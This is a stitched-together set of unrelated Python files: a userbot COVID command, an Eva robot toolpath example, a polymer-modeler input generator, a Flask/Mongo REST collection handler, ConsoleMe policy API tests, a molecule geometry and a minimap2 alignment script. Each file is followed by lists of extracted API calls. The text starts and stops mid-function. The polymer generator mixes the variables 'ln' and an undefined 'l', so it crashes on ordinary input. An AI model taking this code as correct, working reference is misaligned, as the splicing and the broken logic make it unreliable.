count = count + 1
if count % 3 == 0:
if len(s) == count:
result = char + result
else:
result = thousand_separator + char + result
else:
result = char + result
return result
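
# Worked examples, derived from the loop above:
#   format_integer(1234567)                          -> '1.234.567'
#   format_integer(1234567, thousand_separator=",")  -> '1,234,567'
# The reversed string is walked right to left and a separator is inserted
# before every third digit, except at the very start of the number.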
CMD_HELP.update({
"covid":
".covid <country>"
"\nUsage: Get an information about data covid-19 in your country."
})
|
[
"userbot.CMD_HELP.update",
"covid.Covid",
"userbot.events.register"
] |
[((326, 381), 'userbot.events.register', 'register', ([], {'outgoing': '(True)', 'pattern': '"""^\\\\.covid(?: |$)(.*)"""'}), "(outgoing=True, pattern='^\\\\.covid(?: |$)(.*)')\n", (334, 381), False, 'from userbot.events import register\n'), ((2059, 2181), 'userbot.CMD_HELP.update', 'CMD_HELP.update', (['{\'covid\':\n """.covid <country>\nUsage: Get an information about data covid-19 in your country."""\n }'], {}), '({\'covid\':\n """.covid <country>\nUsage: Get an information about data covid-19 in your country."""\n })\n', (2074, 2181), False, 'from userbot import CMD_HELP\n'), ((531, 559), 'covid.Covid', 'Covid', ([], {'source': '"""worldometers"""'}), "(source='worldometers')\n", (536, 559), False, 'from covid import Covid\n')]
|
#!/usr/bin/env python3
from automata.Eva import Eva
import time
import json
import logging
# This example shows usage of the Eva object, used for controlling Eva,
# reading Eva's current state and responding to different events triggered
# by Eva's operation.
host_ip = input("Please enter a Eva IP: ")
token = input("Please enter a valid Eva token: ")
eva = Eva(host_ip, token)
# Send Eva to a waypoint
with eva.lock():
eva.control_wait_for_ready()
eva.control_go_to([0, 0, 0, 0, 0, 0])
# Print Eva's toolpaths
toolpaths = eva.toolpaths_list()
outToolpaths = []
for toolpathItem in toolpaths:
toolpath = eva.toolpaths_retrieve(toolpathItem['id'])
outToolpaths.append(toolpath)
print(json.dumps(outToolpaths))
# Create a basic toolpath and execute it
toolpath = {
"metadata":{
"default_velocity":0.7,
"next_label_id":5,
"analog_modes":{ "i0":"voltage", "i1":"voltage", "o0":"voltage", "o1":"voltage" }
},
"waypoints":[
{ "joints":[-0.68147224, 0.3648368, -1.0703622, 9.354615e-05, -2.4358354, -0.6813218], "label_id":3 },
{ "joints":[-0.6350288, 0.25192022, -1.0664424, 0.030407501, -2.2955494, -0.615318], "label_id":2 },
{ "joints":[-0.13414459, 0.5361486, -1.280493, -6.992453e-08, -2.3972468, -0.13414553], "label_id":1 },
{ "joints":[-0.4103904, 0.33332264, -1.5417944, -5.380291e-06, -1.9328799, -0.41031334], "label_id":4 }
],
"timeline":[
{ "type":"home", "waypoint_id":2 },
{ "type":"trajectory", "trajectory":"joint_space", "waypoint_id":1 },
{ "type":"trajectory", "trajectory":"joint_space", "waypoint_id":0 },
{ "type":"trajectory", "trajectory":"joint_space", "waypoint_id":2 }
]
}
with eva.lock():
eva.control_wait_for_ready()
eva.toolpaths_use(toolpath)
eva.control_home()
eva.control_run(loop=1)
|
[
"automata.Eva.Eva",
"json.dumps"
] |
[((364, 383), 'automata.Eva.Eva', 'Eva', (['host_ip', 'token'], {}), '(host_ip, token)\n', (367, 383), False, 'from automata.Eva import Eva\n'), ((707, 731), 'json.dumps', 'json.dumps', (['outToolpaths'], {}), '(outToolpaths)\n', (717, 731), False, 'import json\n')]
|
"""
Functions for manipulating Polymer Modeler files.
"""
import os

from polymerxtal.polymod import main, readPDB
from .validate import validate_bonds, readbond
def generate_polymod_input(polymer_custom_input):
polymer_custom_output = polymer_custom_input + "_latch.in"
polymer_type_custom = {}
src = open(polymer_custom_input)
des = open(polymer_custom_output, "w")
des.write("#\n")
des.write("\n")
des.write("# You shouldn't need this line if you build PolymerModeler\n")
des.write("data_dir latch #/home/ben/work/PolymerModeler/src/latch/data\n")
des.write("\n")
des.write("# Use this scale to extend VdW radii when searching for bonds\n")
des.write("bond_scale 1.2 \n")
des.write("\n")
des.write("# Temperature (K)\n")
des.write("temperature 300\n")
des.write("\n")
des.write("# Make bonds of this length (in Angstroms) along the backbone\n")
des.write("backbone_bond_length 1.53\n")
des.write("\n")
des.write(
"# Atoms connected by fewer than this many bonds do NOT feel pair interactions\n"
)
des.write("bond_cutoff 4\n")
des.write("\n")
num_monomer = 0
num_chain = 0
polymer_type_custom["num_monomer"] = 0
polymer_type_custom["num_chain"] = 0
for line in src.readlines():
valid_line = line.split("#")[0]
ln = valid_line.split()
if len(ln) < 1:
continue
if ln[0] == "monomer_type":
if len(ln) > 1:
polymer_type_custom["num_monomer"] = int(ln[1])
if polymer_type_custom["num_monomer"] < 1:
print(
"Please specify a positive number of custom monomer types you wish to build"
)
return False
else:
print(
"Please specify a positive number of custom monomer types you wish to build"
)
return False
if ln[0] == "monomer":
if "monomer" not in polymer_type_custom:
polymer_type_custom["monomer"] = {}
num_monomer += 1
if num_monomer <= polymer_type_custom["num_monomer"]:
polymer_type_custom["monomer"][num_monomer] = {}
if len(ln[1:]) == 3:
polymer_type_custom["monomer"][num_monomer]["info"] = ln[1:]
if not os.path.exists("../" + ln[1]):
print("Could not find monomer PDB File %s" % ln[1])
return False
elif int(ln[2]) == int(ln[3]):
print(
"Monomer tail atom should not be the same with the head atom"
)
return False
else:
des.write("#monomer: name PDB head tail\n")
des.write(
"monomer m%d ../%s %d %d\n"
% (num_monomer, ln[1], int(ln[2]), int(ln[3]))
)
des.write("\n")
des.write(
"# Let all backbone torsions rotate when monomer m1 is used in a chain\n"
)
des.write("torsion all free \n")
des.write("\n")
else:
print(
"Please specify monomer %d information with monomer PDB file, head atom & tail atom"
% num_monomer
)
return False
else:
print("More monomer input than specified, Please change accordingly")
return False
if ln[0] == "torsion":
if "torsion" not in polymer_type_custom["monomer"][num_monomer]:
polymer_type_custom["monomer"][num_monomer]["torsion"] = {}
if len(ln) > 2:
polymer_type_custom["monomer"][num_monomer]["torsion"][ln[1]] = ln[2:]
if int(ln[2]) < 0 or int(ln[2]) > 3:
print("Please specify backbone torsion angle probabilities type")
print(
"Starting with backbone atom 3, specify whether the torsion should change, and, if so, how."
)
print("Values for specification:")
print(" 0: no change")
print(" 1: uniform probability for all angles")
print(" 2: energy levels associated with specific angless")
print(" 3: probability associated with specific angles")
return False
elif int(ln[2]) == 2 or int(ln[2]) == 3:
if len(ln) > 3:
if not os.path.exists("../" + ln[3]):
print("Could not find file %s" % ln[3])
return False
elif int(ln[2]) == 2:
print(
"Please specify file for energy levels associated with specific angles"
)
return False
elif int(ln[2]) == 3:
print(
"Please specify file for probability associated with specific angles"
)
return False
else:
print("Please specify backbone torsion angle probabilities information")
return False
if ln[0] == "chain_stereo":
if len(ln) > 1:
polymer_type_custom["num_chain"] = int(ln[1])
if polymer_type_custom["num_chain"] < 1:
print(
"Please specify a positive number of custom polymer chain types you wish to build"
)
return False
elif len(ln[2:]) == 2 * polymer_type_custom["num_chain"]:
if "chain" not in polymer_type_custom:
polymer_type_custom["chain"] = {}
for i in range(polymer_type_custom["num_chain"]):
if int(ln[2 * i + 2]) not in polymer_type_custom["chain"]:
polymer_type_custom["chain"][int(ln[2 * i + 2])] = {}
polymer_type_custom["chain"][int(ln[2 * i + 2])][
"probability"
] = eval(ln[2 * i + 3])
else:
print(
"Please specify Distribution of %d chain types"
% polymer_type_custom["num_chain"]
)
return False
else:
print(
"Please specify a positive number of custom polymer chain types you wish to build"
)
return False
if l[0] == "chain_type":
if "chain" not in polymer_type_custom:
polymer_type_custom["chain"] = {}
num_chain += 1
            if len(ln[1:]) > 1:
if num_chain not in polymer_type_custom["chain"]:
polymer_type_custom["chain"][num_chain] = {}
if "arrangement" not in polymer_type_custom["chain"][num_chain]:
polymer_type_custom["chain"][num_chain]["arrangement"] = {}
                if int(ln[1]) == 0:
                    if int(ln[2]) < 1:
                        print(
                            "Please specify a positive number of monomers in the first pattern for chain type %d"
% num_chain
)
return False
                    elif int(ln[2]) != len(ln[3:]):
                        print(
                            "Please specify a sequence of %d monomer(s) as repeated pattern for chain type %d"
                            % (int(ln[2]), num_chain)
)
return False
else:
polymer_type_custom["chain"][num_chain]["arrangement"] = {
"type": 0,
"len": int(l[2]),
"sequence": l[3:],
}
                elif int(ln[1]) == 1:
                    if polymer_type_custom["num_monomer"] != len(ln[2:]):
                        print(
                            "Please specify %d probabilities, one for each monomer type"
                            % polymer_type_custom["num_monomer"]
)
return False
else:
polymer_type_custom["chain"][num_chain]["arrangement"] = {
"type": 1,
"sequence": l[2:],
}
else:
print(
"Please specify chain type %d information with arrangement: 0 = pattern, 1 = probability"
% num_chain
)
return False
else:
print(
"Please specify chain type %d information with arrangement: 0 = pattern, 1 = probability"
% num_chain
)
return False
src.close()
des.write("# Pattern of monomers used to make chains\n")
des.write("stereo s1 pattern 1 m1\n")
des.write("\n")
des.write("# System density in g/cm^3\n")
des.write("density 0.5\n")
des.write("\n")
des.write("# Build this many chains\n")
des.write("chains 0\n")
des.write("\n")
des.write("# Chains have this many monomers\n")
des.write("monomers 0\n")
des.write("\n")
des.write("#exclude invert slab <real> <real> <real> <real> <real> <real>\n")
des.write("\n")
des.write("# Distribution of chain types: all chains of type s1\n")
des.write("chain_stereo 1 s1 1.0\n")
des.write("\n")
des.write("# Size of system grid\n")
des.write("grid_size 6.0\n")
des.write("\n")
des.write("# Chain packing algorithm\n")
des.write("sample monte_carlo\n")
des.write("\n")
des.write("# Sample this many Monte Carlo configurations\n")
des.write("configs 50\n")
des.write("\n")
des.write("# Energy expression: Lennard-Jones\n")
des.write("energy LJ\n")
des.write("\n")
des.write("# Energy cutoff (Angstroms)\n")
des.write("energy_cutoff 6.0\n")
des.write("\n")
des.write("# RNG seed; if commented out, or zero, use current time\n")
des.write("#rng_seed 0\n")
des.write("\n")
des.write("# Output\n")
des.write("# Write an output PDB file with NON-periodic atomic positions\n")
des.write("#write unwrapped_pdb\n")
des.write("#write wrapped_pdb | unwrapped_pdb | wrapped_xyz | unwrapped_xyz\n")
des.write("\n")
des.write("# Write intermediate files for input to Chunyu's code\n")
des.write("write intermediate\n")
des.write("\n")
des.write("# Log output messages to this file; default is stdout\n")
des.write("#log_file <path>\n")
des.write("\n")
des.write("# Log status messages to this file; default is stdout\n")
des.write("#status_file <path>\n")
des.write("\n")
des.close()
return polymer_custom_output, polymer_type_custom
def success_run_polymod(infile):
try:
main([infile])
return True
except KeyError:
return False
def get_connectivity(path):
bonds = readbond(path)
connectivity = {}
for bond in bonds:
atom1 = bond[0]
atom2 = bond[1]
if atom1 not in connectivity:
connectivity[atom1] = []
connectivity[atom1].append(atom2)
if atom2 not in connectivity:
connectivity[atom2] = []
connectivity[atom2].append(atom1)
return connectivity
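
# Illustrative example (hypothetical bond list): if readbond() returned
# [[1, 2], [2, 3]], the resulting map would be
#   {1: [2], 2: [1, 3], 3: [2]}
# i.e. each atom id maps to the list of atom ids it is bonded to.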
def run_polymod(infile, validate_bond=False):
while not success_run_polymod(infile):
pass
if validate_bond:
h = readPDB(".tmp/chains_unwrapped.pdb")
while not validate_bonds(h.pos, ".tmp/bonds.dat"):
while not success_run_polymod(infile):
pass
h = readPDB(".tmp/chains_unwrapped.pdb")
# return h
# os.system('./polybuild run_file.txt')
# return_code = subprocess.Popen('./polybuild run_file.txt > out', shell=True,
# stdin=subprocess.PIPE, stdout=subprocess.PIPE,
# stderr=subprocess.PIPE)
# stdout,stderr = return_code.communicate()
# return return_code
def read_latchout(ifile, Dir=None):
    # Avoid Python's shared-mutable-default pitfall: build a fresh dict per
    # call unless the caller explicitly passes one in to merge into.
    if Dir is None:
        Dir = {}
    src = open(ifile)
m_flag = 0
mD_flag = 0
mD_count = 0
m_id = 0
for line in src.readlines():
ln = line.split()
if len(ln) == 4 and ln[1] == "known" and ln[2] == "atom" and ln[3] == "types:":
Dir["atom_type"] = int(ln[0])
if len(ln) == 2 and ln[0] == "Monomer" and ln[1][0] == "m":
mD_flag = 0
m_flag = 1
m_id = int(ln[1][1:-1])
if "monomer" not in Dir:
Dir["monomer"] = {}
if m_id not in Dir["monomer"]:
Dir["monomer"][m_id] = {}
Dir["monomer"][m_id]["info"] = {}
continue
if (
m_flag
and len(ln) == 5
and ln[0] == "Internal"
and ln[1] == "coordinates"
and ln[2] == "with"
and ln[3] == "Dreiding"
and ln[4] == "types:"
):
mD_flag = 1
continue
if mD_flag and len(ln) == 3 and ln[1] == "backbone" and ln[2] == "atoms":
mD_flag = 0
mD_count = 0
if "torsion" not in Dir["monomer"][m_id]:
Dir["monomer"][m_id]["torsion"] = {}
Dir["monomer"][m_id]["torsion"]["len"] = int(ln[0])
if mD_flag:
Dir["monomer"][m_id]["info"][mD_count] = ln
mD_count += 1
if (
len(ln) == 7
and ln[0] == "mass"
and ln[1] == "(without"
and ln[2] == "head"
and ln[3] == "and"
and ln[4] == "tail):"
and ln[6] == "amu"
):
Dir["monomer"][m_id]["mass"] = eval(ln[5])
src.close()
return Dir
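
# For reference, the token checks above imply parsed lines shaped like:
#   "<N> known atom types:"                  -> Dir['atom_type'] = N
#   "Monomer m<id>:"                         -> opens a monomer section
#   "<N> backbone atoms"                     -> torsion length for that monomer
#   "mass (without head and tail): <X> amu"  -> Dir['monomer'][id]['mass'] = X
# (shapes inferred from the parsing conditions, not from a sample file)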
|
[
"polymerxtal.polymod.main",
"polymerxtal.polymod.readPDB"
] |
[((11465, 11479), 'polymerxtal.polymod.main', 'main', (['[infile]'], {}), '([infile])\n', (11469, 11479), False, 'from polymerxtal.polymod import main, readPDB\n'), ((12089, 12125), 'polymerxtal.polymod.readPDB', 'readPDB', (['""".tmp/chains_unwrapped.pdb"""'], {}), "('.tmp/chains_unwrapped.pdb')\n", (12096, 12125), False, 'from polymerxtal.polymod import main, readPDB\n'), ((12275, 12311), 'polymerxtal.polymod.readPDB', 'readPDB', (['""".tmp/chains_unwrapped.pdb"""'], {}), "('.tmp/chains_unwrapped.pdb')\n", (12282, 12311), False, 'from polymerxtal.polymod import main, readPDB\n')]
|
# -*- coding: utf-8 -*-
"""
Madame.handler.collections
~~~~~~~~~~
Handler for collections.
:copyright: (c) 2012 by <NAME>.
:license: MIT, see LICENSE for more details.
"""
from datetime import datetime
from flask.helpers import json
from flask.views import MethodView
from madame.response import send_response, send_error
from madame.utils import get_etag, format_args, get_document_link, get_self_link, get_parent_link
from madame.validator import Validator
from flask import request
from simplejson import JSONDecodeError
from werkzeug.exceptions import abort
class CollectionsHandler(MethodView):
def __init__(self, app, mongo, response_type='json'):
self.app = app
self.mongo = mongo
def get(self, collection):
"""
Route : GET /<collection>/
Description : Gets the list of documents in the given collection
        filtered with the given query arguments.
        Returns a list of links to the matching documents.
"""
if not self.app.config['COLLECTION_GET']:
abort(405)
if collection not in self.app.DOMAINS:
abort(404)
args = request.values.to_dict()
if args:
args, opts = format_args(args)
cursor = self.mongo.db[collection].find(args, **opts)
else:
cursor = self.mongo.db[collection].find(limit=20)
base_url = request.base_url
#: Building response
response = {'links' : [], 'title' :'', 'description' : ''}
if 'title' in self.app.DOMAINS[collection]:
response['title'] = self.app.DOMAINS[collection]['title']
if 'description' in self.app.DOMAINS[collection]:
response['description'] = self.app.DOMAINS[collection]['description']
response['links'].append(get_self_link(
title=response['title'],
base_url=base_url,
description='You are here.',
methods=["GET", "POST", "DELETE"]
))
response['links'].append(get_parent_link(base_url))
for document in cursor:
response['links'].append(get_document_link(document, base_url))
return send_response(response)
def post(self, collection):
"""
Route : POST /<collection>/
        Description : Creates a document in the given collection.
        Returns the document's location and etag on success.
"""
if not self.app.config['COLLECTION_POST']:
abort(405)
if collection not in self.app.DOMAINS:
abort(404)
if request.mimetype != 'application/json':
return send_error(415, "JSON_NEEDED", "Accepted media type : application/json")
data = request.data
if not data:
return send_error(400, "EMPTY_DATA")
        if isinstance(data, (str, bytes)):
try:
data = json.loads(data)
except JSONDecodeError:
return send_error(400, "BAD_JSON_FORMAT")
if isinstance(data, dict):
status = self.validate(data, collection)
if status['created']:
base_url = request.base_url
response = {'title': "Document created", 'links': []}
response['links'].append(get_self_link(
title=self.app.DOMAINS[collection]['title'],
base_url=base_url,
description='You are here.',
methods=["GET", "POST", "DELETE"]
))
response['links'].append(get_document_link(status['document'], base_url))
return send_response(response, 201, get_etag(status['document']))
else:
return send_error(400, "VALIDATION_ERROR", status['issues'])
return send_error(400, "BAD_DATA_FORMAT")
def delete(self, collection):
"""
Route : DELETE /<collection>/
Description : Deletes every document in the given collection.
Returns status
"""
if not self.app.config['COLLECTION_DELETE']:
abort(405)
if collection not in self.app.DOMAINS:
abort(404)
self.mongo.db[collection].drop()
return send_response('')
def validate(self, item, collection):
date_utc = datetime.utcnow()
v = Validator()
if v.validate(item, self.app.DOMAINS[collection]['schema']):
item['created'] = item['updated'] = date_utc
id = self.mongo.db[collection].insert(item)
item = self.mongo.db[collection].find_one({"_id" : id})
response = ({'created' : True, 'document' : item})
else:
response = ({'created' : False, 'issues' : v.error})
return response
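
    # For reference, validate() returns one of two shapes:
    #   {'created': True, 'document': <document as stored, with timestamps>}
    #   {'created': False, 'issues': <Validator error details>}
    # depending on whether the item passed the collection's schema.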
|
[
"flask.request.values.to_dict",
"werkzeug.exceptions.abort",
"flask.helpers.json.loads",
"madame.response.send_error",
"madame.response.send_response",
"madame.utils.get_document_link",
"datetime.datetime.utcnow",
"madame.utils.get_etag",
"madame.utils.get_parent_link",
"madame.utils.get_self_link",
"madame.validator.Validator",
"madame.utils.format_args"
] |
[((1144, 1168), 'flask.request.values.to_dict', 'request.values.to_dict', ([], {}), '()\n', (1166, 1168), False, 'from flask import request\n'), ((2164, 2187), 'madame.response.send_response', 'send_response', (['response'], {}), '(response)\n', (2177, 2187), False, 'from madame.response import send_response, send_error\n'), ((3799, 3833), 'madame.response.send_error', 'send_error', (['(400)', '"""BAD_DATA_FORMAT"""'], {}), "(400, 'BAD_DATA_FORMAT')\n", (3809, 3833), False, 'from madame.response import send_response, send_error\n'), ((4228, 4245), 'madame.response.send_response', 'send_response', (['""""""'], {}), "('')\n", (4241, 4245), False, 'from madame.response import send_response, send_error\n'), ((4308, 4325), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (4323, 4325), False, 'from datetime import datetime\n'), ((4338, 4349), 'madame.validator.Validator', 'Validator', ([], {}), '()\n', (4347, 4349), False, 'from madame.validator import Validator\n'), ((1047, 1057), 'werkzeug.exceptions.abort', 'abort', (['(405)'], {}), '(405)\n', (1052, 1057), False, 'from werkzeug.exceptions import abort\n'), ((1118, 1128), 'werkzeug.exceptions.abort', 'abort', (['(404)'], {}), '(404)\n', (1123, 1128), False, 'from werkzeug.exceptions import abort\n'), ((1211, 1228), 'madame.utils.format_args', 'format_args', (['args'], {}), '(args)\n', (1222, 1228), False, 'from madame.utils import get_etag, format_args, get_document_link, get_self_link, get_parent_link\n'), ((1800, 1926), 'madame.utils.get_self_link', 'get_self_link', ([], {'title': "response['title']", 'base_url': 'base_url', 'description': '"""You are here."""', 'methods': "['GET', 'POST', 'DELETE']"}), "(title=response['title'], base_url=base_url, description=\n 'You are here.', methods=['GET', 'POST', 'DELETE'])\n", (1813, 1926), False, 'from madame.utils import get_etag, format_args, get_document_link, get_self_link, get_parent_link\n'), ((2014, 2039), 'madame.utils.get_parent_link', 'get_parent_link', (['base_url'], {}), '(base_url)\n', (2029, 2039), False, 'from madame.utils import get_etag, format_args, get_document_link, get_self_link, get_parent_link\n'), ((2462, 2472), 'werkzeug.exceptions.abort', 'abort', (['(405)'], {}), '(405)\n', (2467, 2472), False, 'from werkzeug.exceptions import abort\n'), ((2533, 2543), 'werkzeug.exceptions.abort', 'abort', (['(404)'], {}), '(404)\n', (2538, 2543), False, 'from werkzeug.exceptions import abort\n'), ((2614, 2686), 'madame.response.send_error', 'send_error', (['(415)', '"""JSON_NEEDED"""', '"""Accepted media type : application/json"""'], {}), "(415, 'JSON_NEEDED', 'Accepted media type : application/json')\n", (2624, 2686), False, 'from madame.response import send_response, send_error\n'), ((2755, 2784), 'madame.response.send_error', 'send_error', (['(400)', '"""EMPTY_DATA"""'], {}), "(400, 'EMPTY_DATA')\n", (2765, 2784), False, 'from madame.response import send_response, send_error\n'), ((4090, 4100), 'werkzeug.exceptions.abort', 'abort', (['(405)'], {}), '(405)\n', (4095, 4100), False, 'from werkzeug.exceptions import abort\n'), ((4161, 4171), 'werkzeug.exceptions.abort', 'abort', (['(404)'], {}), '(404)\n', (4166, 4171), False, 'from werkzeug.exceptions import abort\n'), ((2110, 2147), 'madame.utils.get_document_link', 'get_document_link', (['document', 'base_url'], {}), '(document, base_url)\n', (2127, 2147), False, 'from madame.utils import get_etag, format_args, get_document_link, get_self_link, get_parent_link\n'), ((2888, 2904), 'flask.helpers.json.loads', 
'json.loads', (['data'], {}), '(data)\n', (2898, 2904), False, 'from flask.helpers import json\n'), ((3730, 3783), 'madame.response.send_error', 'send_error', (['(400)', '"""VALIDATION_ERROR"""', "status['issues']"], {}), "(400, 'VALIDATION_ERROR', status['issues'])\n", (3740, 3783), False, 'from madame.response import send_response, send_error\n'), ((2964, 2998), 'madame.response.send_error', 'send_error', (['(400)', '"""BAD_JSON_FORMAT"""'], {}), "(400, 'BAD_JSON_FORMAT')\n", (2974, 2998), False, 'from madame.response import send_response, send_error\n'), ((3276, 3422), 'madame.utils.get_self_link', 'get_self_link', ([], {'title': "self.app.DOMAINS[collection]['title']", 'base_url': 'base_url', 'description': '"""You are here."""', 'methods': "['GET', 'POST', 'DELETE']"}), "(title=self.app.DOMAINS[collection]['title'], base_url=\n base_url, description='You are here.', methods=['GET', 'POST', 'DELETE'])\n", (3289, 3422), False, 'from madame.utils import get_etag, format_args, get_document_link, get_self_link, get_parent_link\n'), ((3558, 3605), 'madame.utils.get_document_link', 'get_document_link', (["status['document']", 'base_url'], {}), "(status['document'], base_url)\n", (3575, 3605), False, 'from madame.utils import get_etag, format_args, get_document_link, get_self_link, get_parent_link\n'), ((3659, 3687), 'madame.utils.get_etag', 'get_etag', (["status['document']"], {}), "(status['document'])\n", (3667, 3687), False, 'from madame.utils import get_etag, format_args, get_document_link, get_self_link, get_parent_link\n')]
|
"""Docstring in public module."""
import os
import sys
import ujson as json
from tornado.testing import AsyncHTTPTestCase
APP_ROOT = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
sys.path.append(os.path.join(APP_ROOT, ".."))
class TestPoliciesApi(AsyncHTTPTestCase):
def get_app(self):
from consoleme.routes import make_app
return make_app(jwt_validator=lambda x: {})
def test_policies_api(self):
from consoleme.config import config
headers = {
config.get("auth.user_header_name"): "<EMAIL>",
config.get("auth.groups_header_name"): "groupa,groupb,groupc",
}
body = json.dumps({"filters": {}})
response = self.fetch(
"/api/v2/policies?markdown=true", headers=headers, method="POST", body=body
)
self.assertEqual(response.code, 200)
response_j = json.loads(response.body)
self.assertEqual(len(response_j), 16)
first_entity = response_j[0]
self.assertEqual(first_entity["account_id"], "123456789012")
self.assertEqual(first_entity["account_name"], "default_account")
def test_policies_check_api(self):
from consoleme.config import config
headers = {
config.get("auth.user_header_name"): "<EMAIL>",
config.get("auth.groups_header_name"): "groupa,groupb,groupc",
}
body = """{
"Version": "2012-10-17",
"Statement": {
"Effect": "Allow",
"Action":["s3:GetObject"],
"Resource": ["arn:aws:s3:::bucket1"]
}
}"""
response = self.fetch(
"/api/v2/policies/check", headers=headers, method="POST", body=body
)
self.assertEqual(response.code, 200)
response_j = json.loads(response.body)
self.assertEqual(len(response_j), 1)
first_error = response_j[0]
self.assertEqual(first_error["issue"], "RESOURCE_MISMATCH")
self.assertEqual(
first_error["title"], "No resources match for the given action"
)
self.assertEqual(first_error["severity"], "MEDIUM")
|
[
"os.path.dirname",
"ujson.loads",
"consoleme.routes.make_app",
"consoleme.config.config.get",
"ujson.dumps",
"os.path.join"
] |
[((214, 242), 'os.path.join', 'os.path.join', (['APP_ROOT', '""".."""'], {}), "(APP_ROOT, '..')\n", (226, 242), False, 'import os\n'), ((164, 189), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (179, 189), False, 'import os\n'), ((373, 409), 'consoleme.routes.make_app', 'make_app', ([], {'jwt_validator': '(lambda x: {})'}), '(jwt_validator=lambda x: {})\n', (381, 409), False, 'from consoleme.routes import make_app\n'), ((669, 696), 'ujson.dumps', 'json.dumps', (["{'filters': {}}"], {}), "({'filters': {}})\n", (679, 696), True, 'import ujson as json\n'), ((892, 917), 'ujson.loads', 'json.loads', (['response.body'], {}), '(response.body)\n', (902, 917), True, 'import ujson as json\n'), ((1823, 1848), 'ujson.loads', 'json.loads', (['response.body'], {}), '(response.body)\n', (1833, 1848), True, 'import ujson as json\n'), ((521, 556), 'consoleme.config.config.get', 'config.get', (['"""auth.user_header_name"""'], {}), "('auth.user_header_name')\n", (531, 556), False, 'from consoleme.config import config\n'), ((581, 618), 'consoleme.config.config.get', 'config.get', (['"""auth.groups_header_name"""'], {}), "('auth.groups_header_name')\n", (591, 618), False, 'from consoleme.config import config\n'), ((1261, 1296), 'consoleme.config.config.get', 'config.get', (['"""auth.user_header_name"""'], {}), "('auth.user_header_name')\n", (1271, 1296), False, 'from consoleme.config import config\n'), ((1321, 1358), 'consoleme.config.config.get', 'config.get', (['"""auth.groups_header_name"""'], {}), "('auth.groups_header_name')\n", (1331, 1358), False, 'from consoleme.config import config\n')]
|
import pulsar as psr
def load_ref_system():
""" Returns l-valine as found in the IQMol fragment library.
All credit to https://github.com/nutjunkie/IQmol
"""
return psr.make_system("""
C 0.2036 -0.4958 0.3403
N 1.4832 -1.2440 0.2997
C 0.3147 0.9660 0.8346
C -1.0593 1.6179 0.8658
C 0.9346 1.0303 2.2224
C -0.3596 -0.5230 -1.0775
O 0.1045 -0.0437 -2.0961
O -1.5354 -1.1775 -1.2134
H -0.4768 -1.0587 1.0299
H 1.8309 -1.3539 1.2292
H 2.1548 -0.7502 -0.2505
H 0.9641 1.5372 0.1249
H -1.5332 1.6117 -0.1249
H -0.9924 2.6651 1.1892
H -1.7373 1.1021 1.5594
H 0.9116 2.0570 2.6127
H 1.9862 0.7132 2.2244
H 0.3950 0.3965 2.9394
H -1.8067 -1.1757 -2.1262
""")
|
[
"pulsar.make_system"
] |
[((185, 1101), 'pulsar.make_system', 'psr.make_system', (['"""\n C 0.2036 -0.4958 0.3403\n N 1.4832 -1.2440 0.2997\n C 0.3147 0.9660 0.8346\n C -1.0593 1.6179 0.8658\n C 0.9346 1.0303 2.2224\n C -0.3596 -0.5230 -1.0775\n O 0.1045 -0.0437 -2.0961\n O -1.5354 -1.1775 -1.2134\n H -0.4768 -1.0587 1.0299\n H 1.8309 -1.3539 1.2292\n H 2.1548 -0.7502 -0.2505\n H 0.9641 1.5372 0.1249\n H -1.5332 1.6117 -0.1249\n H -0.9924 2.6651 1.1892\n H -1.7373 1.1021 1.5594\n H 0.9116 2.0570 2.6127\n H 1.9862 0.7132 2.2244\n H 0.3950 0.3965 2.9394\n H -1.8067 -1.1757 -2.1262\n """'], {}), '(\n """\n C 0.2036 -0.4958 0.3403\n N 1.4832 -1.2440 0.2997\n C 0.3147 0.9660 0.8346\n C -1.0593 1.6179 0.8658\n C 0.9346 1.0303 2.2224\n C -0.3596 -0.5230 -1.0775\n O 0.1045 -0.0437 -2.0961\n O -1.5354 -1.1775 -1.2134\n H -0.4768 -1.0587 1.0299\n H 1.8309 -1.3539 1.2292\n H 2.1548 -0.7502 -0.2505\n H 0.9641 1.5372 0.1249\n H -1.5332 1.6117 -0.1249\n H -0.9924 2.6651 1.1892\n H -1.7373 1.1021 1.5594\n H 0.9116 2.0570 2.6127\n H 1.9862 0.7132 2.2244\n H 0.3950 0.3965 2.9394\n H -1.8067 -1.1757 -2.1262\n """\n )\n', (200, 1101), True, 'import pulsar as psr\n')]
|
from os.path import exists, dirname, basename, join, abspath
from os import remove
from multiprocessing import cpu_count
from subprocess import run, PIPE
def align_minimap(ref_sequence_path, reads_sequence_path, max_threads=None, output_dir=None, preset="map-ont", sam_only=False, k=15):
"""
Given a reference file and reads file align using minimap, generating a
:param ref_sequence_path:
:param reads_sequence_path:
:param output_dir:
:return:
"""
if max_threads is None:
max_threads = max(1, cpu_count() - 2)
max_threads = str(max_threads)
ref_sequence_path = abspath(ref_sequence_path)
reads_sequence_path = abspath(reads_sequence_path)
print("\n-------- ALIGNING --------\n")
ref_sequence_filename_prefix = basename(ref_sequence_path)
ref_sequence_filename_prefix = "_".join(ref_sequence_filename_prefix.split(".")[:-1])
input_filename_prefix = basename(reads_sequence_path)
input_filename_prefix = "_".join(input_filename_prefix.split(".")[:-1])
output_filename_prefix = input_filename_prefix + "_VS_" + ref_sequence_filename_prefix
# ---- Minimap -----------
output_filename = output_filename_prefix + ".sam"
output_file_path = join(output_dir, output_filename)
arguments = ["minimap2", "-a", "-t", max_threads, "-x", preset, "-k", str(k), ref_sequence_path, reads_sequence_path]
print("\nRUNNING: ", " ".join(arguments))
with open(output_file_path, "w") as output_file:
print("REDIRECTING TO: ", output_file_path, "\n")
run(arguments, cwd=output_dir, stdout=output_file, check=True)
if sam_only:
print("||||||||||||||||||||||||||| SAM ONLY ||||||||||||||||||||||||||| ")
# end early if specified (for Racon)
output_sam_file_path = abspath(join(output_dir, output_filename_prefix + ".sam"))
return output_sam_file_path
# ---- Sort SAM ----------
input_filename = output_filename
output_filename = output_filename_prefix + ".sorted.sam"
arguments = ["samtools", "sort", input_filename, "-@", max_threads, "-O", "SAM", "-o", output_filename]
print("\nRUNNING: ", " ".join(arguments))
run(arguments, cwd=output_dir, check=True)
# ---- Convert to BAM ----
input_filename = output_filename
output_filename = output_filename_prefix + ".sorted.bam"
output_file_path = join(output_dir, output_filename)
arguments = ["samtools", "view", input_filename, "-O", "BAM", "-@", max_threads]
print("\nRUNNING: ", " ".join(arguments))
with open(output_file_path, "w") as output_file:
